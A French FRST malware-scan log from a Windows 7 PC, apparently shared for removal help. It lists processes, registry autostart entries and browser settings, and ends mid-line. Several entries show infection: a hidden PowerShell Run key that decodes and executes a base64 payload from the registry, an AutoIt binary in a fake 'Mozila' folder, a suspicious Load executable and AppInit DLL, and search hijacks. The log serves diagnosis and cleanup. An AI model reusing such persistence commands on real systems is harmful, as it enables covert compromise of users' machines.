Résultats d'analyse de Farbar Recovery Scan Tool (FRST) (x86) Version: 24-07-2016 Exécuté par Arnaud (administrateur) sur ARNAUD-PC (25-07-2016 11:19:05) Exécuté depuis C:\Users\Arnaud\Downloads\Programs Profils chargés: Arnaud (Profils disponibles: Arnaud) Platform: Microsoft Windows 7 Professionnel Service Pack 1 (X86) Langue: Français (France) Internet Explorer Version 8 (Navigateur par défaut: Chrome) Mode d'amorçage: Normal Tutoriel pour Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Processus (Avec liste blanche) ================= (Si un élément est inclus dans le fichier fixlist.txt, le processus sera arrêté. Le fichier ne sera pas déplacé.) (Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtHDVBg.exe (Autodesk, Inc.) C:\Program Files\Autodesk\Content Service\Connect.Service.ContentService.exe (Smadsoft) C:\Program Files\SMADAV\SMΔRTP.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtHDVBg.exe (Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe (Power Software Ltd) C:\Program Files\PowerISO\PWRISOVM.EXE (Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe (Intel Corporation) C:\Windows\System32\hkcmd.exe (Intel Corporation) C:\Windows\System32\igfxpers.exe (Oracle Corporation) C:\Program Files\Common Files\Java\Java Update\jusched.exe (BlueStack Systems, Inc.) C:\Program Files\BlueStacks\HD-Agent.exe (DT Soft Ltd) C:\Program Files\DAEMON Tools Lite\daemon.exe (BitTorrent Inc.) C:\Users\Arnaud\AppData\Roaming\uTorrent\uTorrent.exe (Autodesk, Inc.) C:\Program Files\Autodesk\Autodesk Sync\AdSync.exe (Google Inc.) C:\Users\Arnaud\AppData\Local\Google\Update\GoogleUpdate.exe (AutoIt Team) C:\Users\Arnaud\AppData\Roaming\Mozila\autoit.exe (DVGSoft) C:\Program Files\SuperCopier3\SuperCopier3.exe (BlueStack Systems, Inc.) C:\Program Files\BlueStacks\HD-LogRotatorService.exe (Tonec Inc.) C:\Program Files\Internet Download Manager\IDMan.exe (Microsoft Corporation) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (BlueStack Systems, Inc.) C:\Program Files\BlueStacks\HD-UpdaterService.exe (WIBU-SYSTEMS AG) C:\Program Files\CodeMeter\Runtime\bin\CodeMeterCC.exe () C:\Program Files\Bible Verse\verse.exe (BitTorrent Inc.) C:\Users\Arnaud\AppData\Roaming\uTorrent\updates\3.4.7_42330\utorrentie.exe (BitTorrent Inc.) C:\Users\Arnaud\AppData\Roaming\uTorrent\updates\3.4.7_42330\utorrentie.exe (Tonec Inc.) C:\Program Files\Internet Download Manager\IEMonitor.exe (Microsoft Corporation) C:\Program Files\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe (Microsoft Corporation) C:\Program Files\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe (SafeNet Inc.) C:\Windows\System32\hasplms.exe () C:\ProgramData\DatacardService\HWDeviceService.exe (Huawei Technologies Co., Ltd.) C:\ProgramData\DatacardService\DCSHelper.exe () C:\Program Files\LuckyBrowse\app\LuckyBrowseStarter.exe (Acresso Software Inc.) C:\Program Files\MATLAB\R2010b\etc\win32\lmgrd.exe (Acresso Software Inc.) C:\Program Files\MATLAB\R2010b\etc\win32\lmgrd.exe (Microsoft Corporation) C:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.exe (Nero AG) C:\Program Files\Common Files\Nero\Nero BackItUp 4\NBService.exe (Nitro PDF Software) C:\Program Files\Nitro\Pro 9\NitroPDFDriverService9.exe () C:\Program Files\Nitro\Pro 9\Nitro_UpdateService.exe (Nalpeiron Ltd.) C:\Windows\System32\NLSSRV32.EXE () C:\Windows\System32\rcdsrv.exe () C:\ProgramData\SNS EVDO-Huawei\OnlineUpdate\ouc.exe (Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe (WIBU-SYSTEMS AG) C:\Program Files\CodeMeter\Runtime\bin\CodeMeter.exe (Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe (Yahoo! Inc.) C:\Program Files\Yahoo!\Messenger\Ymsgr_tray.exe () C:\Program Files\Systran\4_0\Premium\SystranServer.exe (Adobe Systems Incorporated) C:\Program Files\Common Files\Adobe\OOBE\PDApp\UWA\AAM Updates Notifier.exe (The MathWorks. Inc.) C:\Program Files\MATLAB\R2010b\etc\win32\MLM.exe (Google Inc.) C:\Users\Arnaud\AppData\Local\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Users\Arnaud\AppData\Local\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Users\Arnaud\AppData\Local\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Users\Arnaud\AppData\Local\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Users\Arnaud\AppData\Local\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Users\Arnaud\AppData\Local\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Users\Arnaud\AppData\Local\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Users\Arnaud\AppData\Local\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Users\Arnaud\AppData\Local\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Users\Arnaud\AppData\Local\Google\Chrome\Application\chrome.exe (Macromedia, Inc.) C:\Users\Arnaud\Desktop\AUTO ECOLE\cour auto ecole\éz.exe (Google Inc.) C:\Users\Arnaud\AppData\Local\Google\Chrome\Application\chrome.exe (Microsoft Corporation) C:\Windows\System32\wscript.exe ==================== Registre (Avec liste blanche) =========================== (Si un élément est inclus dans le fichier fixlist.txt, l'élément de Registre sera restauré à la valeur par défaut ou supprimé. Le fichier ne sera pas déplacé.) HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe [11738184 2013-01-22] (Realtek Semiconductor) HKLM\...\Run: [RtHDVBg_Dolby] => C:\Program Files\Realtek\Audio\HDA\RtHDVBg.exe [953416 2013-01-18] (Realtek Semiconductor) HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2221352 2011-03-24] (Synaptics Incorporated) HKLM\...\Run: [APSDaemon] => C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe [59240 2011-09-27] (Apple Inc.) HKLM\...\Run: [PWRISOVM.EXE] => C:\Program Files\PowerISO\PWRISOVM.EXE [312376 2012-02-09] (Power Software Ltd) HKLM\...\Run: [MSC] => C:\Program Files\Microsoft Security Client\msseces.exe [974432 2014-08-22] (Microsoft Corporation) HKLM\...\Run: [RtsCM] => C:\Windows\RTSCM.EXE [87696 2012-09-19] (Realtek Semiconductor Corp.) HKLM\...\Run: [SunJavaUpdateSched] => C:\Program Files\Common Files\Java\Java Update\jusched.exe [271744 2015-04-10] (Oracle Corporation) HKLM\...\Run: [BlueStacks Agent] => C:\Program Files\BlueStacks\HD-Agent.exe [904824 2015-08-19] (BlueStack Systems, Inc.) HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [500208 2010-03-06] (Adobe Systems Incorporated) HKLM\...\Run: [SwitchBoard] => C:\Program Files\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated) HKLM\...\Run: [AdobeCS5ServiceManager] => C:\Program Files\Common Files\Adobe\CS5ServiceManager\CS5ServiceManager.exe [406992 2010-02-22] (Adobe Systems Incorporated) HKLM\...\Policies\Explorer: [TaskbarNoNotification] 0 HKLM\...\Policies\Explorer: [HideSCAHealth] 0 HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\...\Run: [Messenger (Yahoo!)] => C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe [4351216 2009-05-13] (Yahoo! Inc.) HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\...\Run: [DAEMON Tools Lite] => C:\Program Files\DAEMON Tools Lite\daemon.exe [691656 2009-04-23] (DT Soft Ltd) HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\...\Run: [uTorrent] => C:\Users\Arnaud\AppData\Roaming\uTorrent\uTorrent.exe [2133504 2016-05-24] (BitTorrent Inc.) HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\...\Run: [Autodesk Sync] => C:\Program Files\Autodesk\Autodesk Sync\AdSync.exe [894344 2013-02-05] (Autodesk, Inc.) HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\...\Run: [Google Update] => C:\Users\Arnaud\AppData\Local\Google\Update\GoogleUpdate.exe [144200 2015-08-31] (Google Inc.) HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\...\Run: [Samsung Appstore] => C:\Users\Arnaud\AppData\Roaming\Mozila\autoit.exe [934400 2015-06-23] (AutoIt Team) HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\...\Run: [SuperCopier3] => C:\Program Files\SuperCopier3\SuperCopier3.exe [2689536 2012-12-19] (DVGSoft) HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\...\Run: [GenieFloater] => C:\Program Files\Genie Soft\Genie Cleaner\GenieFloater.exe HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\...\Run: [Skype] => C:\Program Files\Skype\Phone\Skype.exe [26418304 2016-06-29] (Skype Technologies S.A.) HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\...\Run: [IDMan] => C:\Program Files\Internet Download Manager\IDMan.exe [3929296 2016-01-31] (Tonec Inc.) HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\...\Run: [{DD28954F-D516-484C-8B5C-AA13367422CA}] => powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\VxmwYkWLZYATNL').nEcynOfbpybgcp))); HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\...\Run: [Windows Update] => C:\Google\Windowsupdate.lnk [515 2015-05-13] () HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\...\CurrentVersion\Windows: [Load] C:\ProgramData\mszjxin.exe <===== ATTENTION HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\...\Policies\Explorer: [] HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\...\Policies\Explorer: [TaskbarNoNotification] 0 HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\...\Policies\Explorer: [HideSCAHealth] 0 HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\...\MountPoints2: {2894c809-c077-11e5-ba02-705ab6c168ee} - F:\AutoRun.exe HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\...\MountPoints2: {2894c814-c077-11e5-ba02-705ab6c168ee} - F:\AutoRun.exe HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\...\MountPoints2: {34614488-6008-11e4-a517-002314a1a664} - G:\.\Setup.exe AUTORUN=1 HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\...\MountPoints2: {41e59705-4adb-11e4-848b-002314a1a664} - G:\.\Setup.exe AUTORUN=1 HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\...\MountPoints2: {4981ba0c-bf42-11e5-9fd5-705ab6c168ee} - F:\AutoRun.exe HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\...\MountPoints2: {4981ba10-bf42-11e5-9fd5-705ab6c168ee} - F:\AutoRun.exe HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\...\MountPoints2: {5ac32118-b706-11e5-b4ef-002314a1a664} - F:\HiSuiteDownLoader.exe HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\...\MountPoints2: {66bbf63a-9320-11e4-b1c4-002314a1a664} - G:\TL-Bootstrap.exe HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\...\MountPoints2: {69e1ddbf-0510-11e6-a875-002314a1a664} - H:\LGAutoRun.exe HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\...\MountPoints2: {80c74b55-24ab-11e5-b613-705ab6c168ee} - F:\AutoRun.exe HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\...\MountPoints2: {80c74b63-24ab-11e5-b613-705ab6c168ee} - F:\AutoRun.exe HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\...\MountPoints2: {aef619fc-9827-11e4-905c-002314a1a664} - F:\HiSuiteDownLoader.exe HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\...\MountPoints2: {b8d17b9b-464d-11e4-9b8d-806e6f6e6963} - E:\DriverPackSolution.exe HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\...\MountPoints2: {bc02810c-a804-11e5-9a2d-002314a1a664} - F:\LGAutoRun.exe HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\...\MountPoints2: {bc028344-a804-11e5-9a2d-705ab6c168ee} - F:\HiSuiteDownLoader.exe HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\...\MountPoints2: {bed80a50-c80c-11e5-90a2-705ab6c168ee} - F:\AutoRun.exe HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\...\MountPoints2: {d26d3ecc-e8c7-11e4-986d-002314a1a664} - F:\.\Setup.exe AUTORUN=1 HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\...\MountPoints2: {f2d8dd4d-cbf2-11e4-bd31-705ab6c168ee} - G:\AutoRun.exe HKU\S-1-5-18\...\Run: [Autodesk Sync] => C:\Program Files\Autodesk\Autodesk Sync\AdSync.exe [894344 2013-02-05] (Autodesk, Inc.) AppInit_DLLs: C:\ProgramData\Saophase\Inflex.dll => C:\ProgramData\Saophase\Inflex.dll [384512 2015-10-07] () ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => Pas de fichier ShellIconOverlayIdentifiers: [ID de superposition d'icônes des signatures numériques AutoCAD] -> {36A21736-36C2-4C11-8ACB-D4136F2B57BD} => C:\Windows\system32\AcSignIcon.dll [2013-02-08] (Autodesk, Inc.) ShellIconOverlayIdentifiers: [IDM Shell Extension] -> {CDC95B92-E27C-4745-A8C5-64A52A78855D} => C:\Program Files\Internet Download Manager\IDMShellExt.dll [2015-08-14] (Tonec Inc.) Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\CodeMeter Control Center.lnk [2014-09-29] ShortcutTarget: CodeMeter Control Center.lnk -> C:\Program Files\CodeMeter\Runtime\bin\CodeMeterCC.exe (WIBU-SYSTEMS AG) Startup: C:\Users\Arnaud\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bible Verse.lnk [2015-01-20] ShortcutTarget: Bible Verse.lnk -> C:\Program Files\Bible Verse\verse.exe () Startup: C:\Users\Arnaud\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPC Backup.lnk [2016-06-28] ShortcutTarget: MyPC Backup.lnk -> C:\Program Files\OLBPre\OLBPre.exe () GroupPolicy: Restriction - Chrome <======= ATTENTION CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION ==================== Internet (Avec liste blanche) ==================== (Si un élément est inclus dans le fichier fixlist.txt, s'il s'agit d'un élément du Registre, il sera supprimé ou restauré à la valeur par défaut.) Tcpip\Parameters: [DhcpNameServer] 192.168.1.1 0.0.0.0 Tcpip\..\Interfaces\{6FEDCE4C-15E8-4821-953B-FAA6044BA13B}: [DhcpNameServer] 41.190.226.70 208.67.222.222 Tcpip\..\Interfaces\{B052F2D1-AF30-4F27-896E-79BD1FC24B5E}: [NameServer] 195.24.192.33 8.8.8.8 Tcpip\..\Interfaces\{B4E1D44A-8EB5-4AC8-B7BE-D53A9B0040E9}: [NameServer] 195.24.192.33 8.8.8.8 Tcpip\..\Interfaces\{CB27B84E-6829-4617-BF9B-86612791827C}: [DhcpNameServer] 192.168.1.1 0.0.0.0 Internet Explorer: ================== HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.hao123.com/?tn=95611903_hao_pg HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = hxxp://go.microsoft.com/fwlink/?linkid=42826 HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBUTwkzwGbNf1Vk6jjLaGEvVnukhFQSHL4j-kQvIqwdQM_FFIu6tU8JiP6_nU71J_8ZCLoXfTPgM1-iX8fu566DYjv9rHKucLhaV2fJT7sKYuXOn8Fh1B5ZZ0jy0dz905zCC-MczNFsktwQo4bYpm2fpumywNKksPDKwmlfCA,,&q={searchTerms} HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\Software\Microsoft\Internet Explorer\Main,Search Bar = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBUTwkzwGbNf1Vk6jjLaGEvVnukhFQSHL4j-kQvIqwdQM_FFIu6tU8JiP6_nU71J_8ZCLoXfTPgM1-iX8fu566DYjv9rHKucLhaV2fJT7sKYuXOn8Fh1B5ZZ0jy0dz905zCC-MczNFsktwQo4bYpm2fpumywNKksPDKwmlfCA,,&q={searchTerms} HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.hao123.com/?tn=95611903_hao_pg HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\Software\Microsoft\Internet Explorer\Main,First Home Page = hxxp://go.microsoft.com/fwlink/?LinkID=226786&Mkt=fr-FR&Src=MSE&Tid=0003446E&OHP=http%3A%2F%2Fsearchsimple%2Da.akamaihd.net%2F%3FaffID%3Dep,http%3A%2F%2Fgo.microsoft.com%2Ffwlink%2F%3Flinkid%3D69157&OSP=http%3A%2F%2Fsearchsimple%2Da.akamaihd.net%2F%3FaffID%3Dep%26q%3D%7BsearchTerms%7D%26r%3D644 HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\Software\Microsoft\Internet Explorer\Main,SearchAssistant = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBUTwkzwGbNf1Vk6jjLaGEvVnukhFQSHL4j-kQvIqwdQM_FFIu6tU8JiP6_nU71J_8ZCLoXfTPgM1-iX8fu566DYjv9rHKucLhaV2fJT7sKYuXOn8Fh1B5ZZ0jy0dz905zCC-MczNFsktwQo4bYpm2fpumywNKksPDKwmlfCA,,&q={searchTerms} SearchScopes: HKLM -> DefaultScope {ielnksrch} URL = SearchScopes: HKLM -> ielnksrch URL = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBUTwkzwGbNf1Vk6jjLaGEvVnukhFQSHL4j-kQvIqwdQM_FFIu6tU8JiP6_nU71J_8ZCLoXfTPgM1-iX8fu566DYjv9rHKucLhaV2fJT7sKYuXOn8Fh1B5ZZ0jy0dz905zCC-MczNFsktwQo4bYpm2fpumywNKksPDKwmlfCA,,&q={searchTerms} SearchScopes: HKU\S-1-5-21-3295785457-3515427366-3354837301-1000 -> DefaultScope {95B7759C-8C7F-4BF1-B163-73684A933233} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE SearchScopes: HKU\S-1-5-21-3295785457-3515427366-3354837301-1000 -> OldSearch URL = hxxp://www.bing.com/search?FORM=SKY2DF&PC=SKY2&q={searchTerms}&src=IE-SearchBox SearchScopes: HKU\S-1-5-21-3295785457-3515427366-3354837301-1000 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-21-3295785457-3515427366-3354837301-1000 -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = hxxp://www.google.com/search?q={sear SearchScopes: HKU\S-1-5-21-3295785457-3515427366-3354837301-1000 -> {95B7759C-8C7F-4BF1-B163-73684A933233} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE SearchScopes: HKU\S-1-5-21-3295785457-3515427366-3354837301-1000 -> {AD22EBAF-0D18-4fc7-90CC-5EA0ABBE9EB8} URL = hxxp://www.daemon-search.com/search?q={searchTerms} SearchScopes: HKU\S-1-5-21-3295785457-3515427366-3354837301-1000 -> {D90D266C-4C72-407C-973E-AA5293E5A497} URL = hxxp://searchsimple-a.akamaihd.net/?affID=mt-ep&q={searchTerms}&r=400 SearchScopes: HKU\S-1-5-21-3295785457-3515427366-3354837301-1000 -> {F2ED7B58-F213-448B-A58D-17ABDF60CCEB} URL = hxxp://isearch.avg.com/search?cid={3275E8C8-96B2-4AAA-8EEA-2ECEB9456D0C}&mid=08fc948e79a847d2ae61d16a52454f97-c8e39524f40e90e1f04be933c5d12eff3f44c88f&lang=fr&ds=st011&pr=sa&d=2014-09-30 10:43:11&v=9.0.0.23&sap=dsp&q={searchTerms} SearchScopes: HKU\S-1-5-21-3295785457-3515427366-3354837301-1000 -> {ielnksrch} URL = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBUTwkzwGbNf1Vk6jjLaGEvVnukhFQSHL4j-kQvIqwdQM_FFIu6tU8JiP6_nU71J_8ZCLoXfTPgM1-iX8fu566DYjv9rHKucLhaV2fJT7sKYuXOn8Fh1B5ZZ0jy0dz905zCC-MczNFsktwQo4bYpm2fpumywNKksPDKwmlfCA,,&q={searchTerms} BHO: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files\Internet Download Manager\IDMIECC.dll [2015-12-08] (Internet Download Manager, Tonec Inc.) BHO: Aide pour le lien d'Adobe PDF Reader -> {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} -> C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll [2008-06-11] (Adobe Systems Incorporated) BHO: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2008-06-11] (Adobe Systems Incorporated) BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office15\OCHelper.dll [2012-10-01] (Microsoft Corporation) BHO: PDFXChange 4.0 -> {42DFA04F-0F16-418e-B80C-AB97A5AFAD39} -> C:\Program Files\Tracker Software\PDF-XChange 4\PXCIEAddin4.dll [2011-09-16] (Tracker Softaware) BHO: Ó¦Óñ¦Ò»¼ü°²×°²å¼þ -> {50F4150A-48B2-417A-BE4C-C83F580FB904} -> C:\Program Files\Common Files\Tencent\QQPhoneManager\2.0.201.3192\npQQPhoneManagerExt.dll [2014-05-30] (腾讯公司) BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre7\bin\ssv.dll [2015-05-25] (Oracle Corporation) BHO: Ask Search Assistant BHO -> {9CB65201-89C4-402c-BA80-02D8C59F9B1D} -> C:\Program Files\AskTBar\SrchAstt\1.bin\A5SRCHAS.DLL [2014-09-30] (Ask.com) BHO: Pas de nom -> {aab803bd-f01b-423a-a89a-60af476e9f12} -> Pas de fichier BHO: Skype Browser Helper -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2013-11-20] (Microsoft Corporation) BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office15\URLREDIR.DLL [2012-10-01] (Microsoft Corporation) BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\Office15\GROOVEEX.DLL [2012-10-01] (Microsoft Corporation) BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre7\bin\jp2ssv.dll [2015-05-25] (Oracle Corporation) BHO: Ask Toolbar BHO -> {FE063DB1-4EC0-403e-8DD8-394C54984B2C} -> C:\Program Files\AskTBar\bar\1.bin\ASKTBAR.DLL [2014-09-30] (Ask.com) Toolbar: HKLM - DAEMON Tools Toolbar - {32099AAC-C132-4136-9E9A-4E364A424E17} - C:\Program Files\DAEMON Tools Toolbar\DTToolbar.dll [2009-04-23] () Toolbar: HKLM - PDFXChange 4.0 - {42DFA04F-0F16-418e-B80C-AB97A5AFAD39} - C:\Program Files\Tracker Software\PDF-XChange 4\PXCIEAddin4.dll [2011-09-16] (Tracker Softaware) Toolbar: HKLM - Ask Toolbar - {FE063DB9-4EC0-403e-8DD8-394C54984B2C} - C:\Program Files\AskTBar\bar\1.bin\ASKTBAR.DLL [2014-09-30] (Ask.com) Toolbar: HKLM - Systran Professional Premium 4.0 - {CFB25594-4D5F-11D6-AB7B-00B0D094B576} - C:\Program Files\Systran\4_0\Premium\IEPlugIn.dll [2002-04-12] (SYSTRAN) Toolbar: HKU\S-1-5-21-3295785457-3515427366-3354837301-1000 -> DAEMON Tools Toolbar - {32099AAC-C132-4136-9E9A-4E364A424E17} - C:\Program Files\DAEMON Tools Toolbar\DTToolbar.dll [2009-04-23] () Toolbar: HKU\S-1-5-21-3295785457-3515427366-3354837301-1000 -> Pas de nom - {E7DF6BFF-55A5-4EB7-A673-4ED3E9456D39} - Pas de fichier Toolbar: HKU\S-1-5-21-3295785457-3515427366-3354837301-1000 -> Ask Toolbar - {FE063DB9-4EC0-403E-8DD8-394C54984B2C} - C:\Program Files\AskTBar\bar\1.bin\ASKTBAR.DLL [2014-09-30] (Ask.com) DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} file:///G:/MES%20SET%20UP/DIDACTICIEL%20ROBOT%20BAT/bin/swflash.cab Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office\Office15\MSOSB.DLL [2014-10-14] (Microsoft Corporation) Handler: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2013-11-20] (Microsoft Corporation) StartMenuInternet: IEXPLORE.EXE - C:\Program Files\Internet Explorer\iexplore.exe hxxp://www.mystartsearch.com/?type=sc&ts=1419258415&from=epom&uid=HitachiXHTS725050A9A360_100309PCJ400VLH3DD0JX FireFox: ======== FF ProfilePath: C:\Users\Arnaud\AppData\Roaming\Mozilla\Firefox\Profiles\rsf4uj49.default-1446631804636 FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32_20_0_0_235.dll [2015-12-09] () FF Plugin: @docu-track.com/PDF-XChange Viewer Plugin,version=1.0,application/pdf -> C:\Program Files\Tracker Software\PDF Viewer\npPDFXCviewNPPlugin.dll [2000-01-01] (Tracker Software Products Ltd.) FF Plugin: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/pdf -> C:\Program Files\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [2013-04-02] (Foxit Corporation) FF Plugin: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/vnd.fdf -> C:\Program Files\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [2013-04-02] (Foxit Corporation) FF Plugin: @google.com/npPicasa3,version=3.0.0 -> C:\Program Files\Google\Picasa3\npPicasa3.dll [2015-10-13] (Google, Inc.) FF Plugin: @graphisoft.com/GDL Web Plug-in -> C:\Program Files\GRAPHISOFT\GDLWebControl\npGDLMozilla.dll [2012-06-27] (Graphisoft SE) FF Plugin: @java.com/DTPlugin,version=10.79.2 -> C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll [2015-05-25] (Oracle Corporation) FF Plugin: @java.com/JavaPlugin,version=10.79.2 -> C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll [2015-05-25] (Oracle Corporation) FF Plugin: @messenger.yahoo.com/YahooMessengerStatePlugin;version=1.0.0.6 -> C:\Program Files\Yahoo!\Shared\npYState.dll [2009-05-13] (Yahoo! Inc.) FF Plugin: @microsoft.com/GENUINE -> disabled [Pas de fichier] FF Plugin: @microsoft.com/Lync,version=15.0 -> C:\Program Files\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2012-10-01] (Microsoft Corporation) FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll [2014-05-13] ( Microsoft Corporation) FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~1\Office15\NPSPWRAP.DLL [2012-10-01] (Microsoft Corporation) FF Plugin: @nitropdf.com/NitroPDF -> C:\Program Files\Nitro\Pro 9\npnitromozilla.dll [2014-07-16] (Nitro PDF) FF Plugin: @qq.com/npAndroidAssistant -> C:\Program Files\Common Files\Tencent\QQPhoneManager\2.0.201.3192\npQQPhoneManagerExt.dll [2014-05-30] (腾讯公司) FF 